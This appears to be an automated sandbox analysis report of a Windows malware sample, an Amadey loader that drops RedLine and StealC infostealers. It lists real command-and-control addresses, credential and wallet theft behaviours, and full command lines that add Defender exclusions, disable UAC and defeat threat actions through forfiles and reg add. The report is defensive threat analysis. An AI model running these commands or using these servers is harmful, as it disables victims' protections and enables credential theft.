Analysis
- max time kernel: 149s
- max time network: 151s
- platform: windows11-21h2_x64
- resource: win11-20240802-en
- resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 07/08/2024, 09:09
Static task
static1
Behavioral task
behavioral1
Sample
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Resource
win11-20240802-en
General
- Target: 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
- Size: 1.8MB
- MD5: ee8904b675f96658c010ec91c94102c6
- SHA1: 1838a28a91645768f1b186ef05ad797dd29fda12
- SHA256: 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107
- SHA512: 1a6ec563191939662fafd46a976c694a6881c402d2c8c1103e50dfa093f6c40cb136cd0578b5a7b355c62efe50603bbe4128e801f5566451353a31ca25bde336
- SSDEEP: 49152:VDaanUYEobclzT0wAAS5JKtLQpXbfMoAOeTmBxa10:hUYEOQzkAEYLeXL+OegM0
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
- install_dir: 44111dbc49
- install_file: axplong.exe
- strings_key: 8d0ad6945b1a30a186ec2d30be6db0b5
- url_paths: /Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
20.52.165.210:39030
Extracted
redline
185.215.113.67:21405
Extracted
stealc
default
http://185.215.113.17
- url_path: /2fb6c2cc8dce150a.php
Extracted
redline
BUY TG @FATHEROFCARDERS
45.66.231.214:9932
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource | yara_rule
behavioral2/memory/2940-37-0x0000000000400000-0x0000000000452000-memory.dmp | family_redline
behavioral2/files/0x000100000002a97c-91.dat | family_redline
behavioral2/memory/2868-110-0x0000000000110000-0x0000000000162000-memory.dmp | family_redline
behavioral2/files/0x000100000002a996-236.dat | family_redline
behavioral2/memory/1428-251-0x00000000005D0000-0x0000000000622000-memory.dmp | family_redline
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | FILE2233.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | FILE2233.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe = "0" | FILE2233.exe
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
Blocklisted process makes network request 1 IoCs
flow | pid | Process
67 | 4224 | rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
1408 | powershell.exe
2908 | powershell.exe
4752 | powershell.EXE
2084 | powershell.exe
2188 | powershell.exe
4892 | powershell.exe
1360 | powershell.exe
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Control Panel\International\Geo\Nation | fKyKrYk.exe
Drops startup file 3 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UR6UVtITwUngMrJfLVohmFva.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VPyDVwFZzQWLSxOv05XZBkfb.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bn8s93fzFaxqnbV5ntiaqTQx.bat | jsc.exe
Executes dropped EXE 21 IoCs
pid | Process
4836 | axplong.exe
424 | GOLD.exe
3300 | crypteda.exe
2944 | newalp.exe
3032 | Hkbsse.exe
2868 | 06082025.exe
2116 | h9XoUFzLUU.exe
3848 | 0zwMQZV3j5.exe
5084 | stealc_default.exe
4276 | FILE2233.exe
1428 | MYNEWRDX.exe
2856 | GuTcEcCNFDfRxn4taTkm5Qp2.exe
508 | Install.exe
4100 | Install.exe
3040 | 8NYxJZjsZmkPKrv00HfCzotx.exe
1668 | axplong.exe
4812 | Hkbsse.exe
960 | Install.exe
3576 | fKyKrYk.exe
3404 | axplong.exe
1672 | Hkbsse.exe
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine | axplong.exe
Key opened | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Key opened | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine | axplong.exe
Key opened | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine | axplong.exe
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid | Process
960 | forfiles.exe
2324 | forfiles.exe
2960 | forfiles.exe
3016 | forfiles.exe
2364 | forfiles.exe
4800 | forfiles.exe
4584 | forfiles.exe
4348 | forfiles.exe
3588 | forfiles.exe
3336 | forfiles.exe
4264 | forfiles.exe
4972 | forfiles.exe
1080 | forfiles.exe
4864 | forfiles.exe
4600 | forfiles.exe
2252 | forfiles.exe
1136 | forfiles.exe
Loads dropped DLL 3 IoCs
pid | Process
5084 | stealc_default.exe
5084 | stealc_default.exe
4224 | rundll32.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | FILE2233.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | FILE2233.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe = "0" | FILE2233.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | FILE2233.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | FILE2233.exe
Drops Chrome extension 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | fKyKrYk.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | fKyKrYk.exe
Drops desktop.ini file(s) 1 IoCs
description | ioc | Process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | Install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow | ioc
2 | raw.githubusercontent.com
15 | raw.githubusercontent.com
17 | pastebin.com
23 | pastebin.com
29 | raw.githubusercontent.com
Drops file in System32 directory 31 IoCs
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid | Process
2588 | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
4836 | axplong.exe
1668 | axplong.exe
3404 | axplong.exe
Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 424 set thread context of 2940 | 424 | GOLD.exe | 86
PID 3300 set thread context of 1692 | 3300 | crypteda.exe | 91
PID 4276 set thread context of 2300 | 4276 | FILE2233.exe | 104
Drops file in Program Files directory 14 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\ZTBxIWbqU\dAwlTf.dll | fKyKrYk.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | fKyKrYk.exe
File created | C:\Program Files (x86)\ZTBxIWbqU\VNLOHtB.xml | fKyKrYk.exe
File created | C:\Program Files (x86)\OKRdpmURQpaU2\rdtAcwvlbTlfU.dll | fKyKrYk.exe
File created | C:\Program Files (x86)\smKXxMfqpieUC\elYVctC.dll | fKyKrYk.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | fKyKrYk.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | fKyKrYk.exe
File created | C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\yMfLndn.xml | fKyKrYk.exe
File created | C:\Program Files (x86)\aMBHFSbSyrUn\oKLoZCa.dll | fKyKrYk.exe
File created | C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\ldNyzro.dll | fKyKrYk.exe
File created | C:\Program Files (x86)\smKXxMfqpieUC\AxCSftX.xml | fKyKrYk.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | fKyKrYk.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | fKyKrYk.exe
File created | C:\Program Files (x86)\OKRdpmURQpaU2\XVgdGQB.xml | fKyKrYk.exe
Drops file in Windows directory 6 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\axplong.job | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
File created | C:\Windows\Tasks\Hkbsse.job | newalp.exe
File created | C:\Windows\Tasks\bdLMAcyiuofwZlrejw.job | schtasks.exe
File created | C:\Windows\Tasks\voUEtHYOOZwJsxqeG.job | schtasks.exe
File created | C:\Windows\Tasks\yFAmEcnxfnVDyRq.job | schtasks.exe
File created | C:\Windows\Tasks\RNbHXMWSUrQEjcGVS.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid | pid_target | Process | procid_target
2684 | 960 | WerFault.exe | 142
1780 | 4100 | WerFault.exe | 111
3076 | 3576 | WerFault.exe | 233
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 8NYxJZjsZmkPKrv00HfCzotx.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 8NYxJZjsZmkPKrv00HfCzotx.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | stealc_default.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | stealc_default.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Modifies data under HKEY_USERS 64 IoCs
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
404 | schtasks.exe
1412 | schtasks.exe
3464 | schtasks.exe
440 | schtasks.exe
3504 | schtasks.exe
3536 | schtasks.exe
2272 | schtasks.exe
2468 | schtasks.exe
1176 | schtasks.exe
2116 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
2588 | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2588 wrote to memory of 4836 | 2588 | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe | 82
PID 2588 wrote to memory of 4836 | 2588 | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe | 82
PID 2588 wrote to memory of 4836 | 2588 | 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe | 82
PID 4836 wrote to memory of 424 | 4836 | axplong.exe | 84
PID 4836 wrote to memory of 424 | 4836 | axplong.exe | 84
PID 4836 wrote to memory of 424 | 4836 | axplong.exe | 84
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 424 wrote to memory of 2940 | 424 | GOLD.exe | 86
PID 4836 wrote to memory of 3300 | 4836 | axplong.exe | 87
PID 4836 wrote to memory of 3300 | 4836 | axplong.exe | 87
PID 4836 wrote to memory of 3300 | 4836 | axplong.exe | 87
PID 4836 wrote to memory of 2944 | 4836 | axplong.exe | 89
PID 4836 wrote to memory of 2944 | 4836 | axplong.exe | 89
PID 4836 wrote to memory of 2944 | 4836 | axplong.exe | 89
PID 2944 wrote to memory of 3032 | 2944 | newalp.exe | 90
PID 2944 wrote to memory of 3032 | 2944 | newalp.exe | 90
PID 2944 wrote to memory of 3032 | 2944 | newalp.exe | 90
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 3300 wrote to memory of 1692 | 3300 | crypteda.exe | 91
PID 4836 wrote to memory of 2868 | 4836 | axplong.exe | 92
PID 4836 wrote to memory of 2868 | 4836 | axplong.exe | 92
PID 4836 wrote to memory of 2868 | 4836 | axplong.exe | 92
PID 1692 wrote to memory of 2116 | 1692 | RegAsm.exe | 93
PID 1692 wrote to memory of 2116 | 1692 | RegAsm.exe | 93
PID 1692 wrote to memory of 2116 | 1692 | RegAsm.exe | 93
PID 1692 wrote to memory of 3848 | 1692 | RegAsm.exe | 94
PID 1692 wrote to memory of 3848 | 1692 | RegAsm.exe | 94
PID 1692 wrote to memory of 3848 | 1692 | RegAsm.exe | 94
PID 4836 wrote to memory of 5084 | 4836 | axplong.exe | 97
PID 4836 wrote to memory of 5084 | 4836 | axplong.exe | 97
PID 4836 wrote to memory of 5084 | 4836 | axplong.exe | 97
PID 4836 wrote to memory of 4276 | 4836 | axplong.exe | 99
PID 4836 wrote to memory of 4276 | 4836 | axplong.exe | 99
PID 4836 wrote to memory of 1428 | 4836 | axplong.exe | 101
PID 4836 wrote to memory of 1428 | 4836 | axplong.exe | 101
PID 4836 wrote to memory of 1428 | 4836 | axplong.exe | 101
PID 4276 wrote to memory of 1408 | 4276 | FILE2233.exe | 102
PID 4276 wrote to memory of 1408 | 4276 | FILE2233.exe | 102
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 2300 | 4276 | FILE2233.exe | 104
PID 4276 wrote to memory of 1188 | 4276 | FILE2233.exe | 105
PID 4276 wrote to memory of 1188 | 4276 | FILE2233.exe | 105
PID 4276 wrote to memory of 1188 | 4276 | FILE2233.exe | 105
PID 2300 wrote to memory of 2856 | 2300 | jsc.exe | 109
System policy modification 1 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | FILE2233.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe"C:\Users\Admin\AppData\Local\Temp\60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Roaming\h9XoUFzLUU.exe"C:\Users\Admin\AppData\Roaming\h9XoUFzLUU.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Users\Admin\AppData\Roaming\0zwMQZV3j5.exe"C:\Users\Admin\AppData\Roaming\0zwMQZV3j5.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"4⤵
- Executes dropped EXE
PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe"C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe"3⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Users\Admin\Pictures\GuTcEcCNFDfRxn4taTkm5Qp2.exe"C:\Users\Admin\Pictures\GuTcEcCNFDfRxn4taTkm5Qp2.exe"5⤵
- Executes dropped EXE
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\7zS1410.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:508 -
C:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exe.\Install.exe /OjjdidWwa "385104" /S7⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:960 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:1708
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:1672
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4864 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:4656
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:1180
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3336 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:1740
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:3484
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:4584 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
- System Location Discovery: System Language Discovery
PID:4812 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:4404
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
- Indirect Command Execution
PID:4348 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵PID:3356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵
- System Location Discovery: System Language Discovery
PID:2252
-
-
-
-
-
-
